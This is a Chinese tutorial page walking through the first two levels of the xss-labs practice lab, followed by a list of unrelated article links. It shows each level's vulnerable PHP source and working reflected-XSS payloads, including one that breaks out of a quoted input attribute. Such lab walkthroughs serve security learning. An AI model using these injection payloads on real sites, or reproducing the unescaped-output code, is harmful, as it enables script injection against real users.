当前位置: 首页 > news >正文

xss-lab全通关

xss-labs Less-1

首先是代码审计,可以看到是利用name参数进行GET传参,$str没有进行任何的过滤,只要触发了alert函数也就是弹窗了就会自动跳转下一关

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

修改url参数,payload如下

http://xss-labs:86/level1.php?name=<script>alert(1)</script>

xss-labs Less-2

审计一下代码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

看到关键信息,可以看到我们的get传参输入会被直接拼接到""双引号里面

<input name=keyword  value="'.$str.'">

想要绕过我们就将前面的双引号闭合,payload如下

"><script>alert(1)</script>

这样闭合的话input标签就会被提前闭合,然后浏览器就会解析接下来的

http://www.rkmt.cn/news/57169.html

相关文章:

  • 2025年质量好的螺旋风管加工厂家最新推荐权威榜
  • 2025年可靠的耐磨尼龙改性颗粒厂家最新实力排行
  • 251122预感到今天要上硬仗
  • 2025年比较好的厚壁不锈钢焊管TOP实力厂家推荐榜
  • 2025年优秀的榴莲贴体盒厂家推荐及选购参考榜
  • 实用指南:设计模式-迭代器模式(Iterator)
  • 2025年质量好的网带式抛丸机厂家最新权威推荐排行榜
  • 模拟赛 R24
  • 2025年靠谱的电力支架行业内知名厂家排行榜
  • 08.创建型 - 建造者模式 (Builder Pattern)
  • CF2151D 题解
  • 2025 年 11 月激光焊锡焊接机,激光焊锡全自动生产线最新推荐,聚焦资质、案例、售后的五家机构深度解读!
  • 2025年比较好的不锈钢精密铸造铸件TOP实力厂家推荐榜
  • 2025年热门的车间电动叉车厂家最新推荐排行榜
  • 2025年评价高的抗爆防火阀优质厂家推荐榜单
  • 2025年口碑好的切铝圆锯机厂家推荐及选择指南
  • 2025年靠谱的链条式导热油炉厂家最新实力排行
  • Android 常用文件操作方法
  • 穿透EDA
  • 2025年热门的MEE自动复位防火阀厂家最新权威推荐排行榜
  • 2025年靠谱的不锈钢防火阀行业内知名厂家排行榜
  • quick lauching of git-bash
  • 2025年口碑好的天花明装线槽厂家最新推荐权威榜
  • 2025年微波等离子清洗机源头厂家权威推荐榜单:射频等离子清洗机/连续式等离子清洗机/在线式微波等离子清洗机源头厂家精选
  • FontCreator的Unicode分类名称
  • 【JVM】低延迟垃圾收集器:Shenandoah收集器与ZGC收集器 - 实践
  • 2025年11月中国悬浮门品牌口碑推荐榜单前十强深度解析
  • 2025年手持贴标机生产厂家排名TOP10:陕西彩航包装技术领先
  • 深入解析:安卓MX播放器 软件APP MXPlayer v2.1.2、1.93.4 解锁付费PRO版
  • 这款在线番茄钟工具,帮你找回高效专注的工作节奏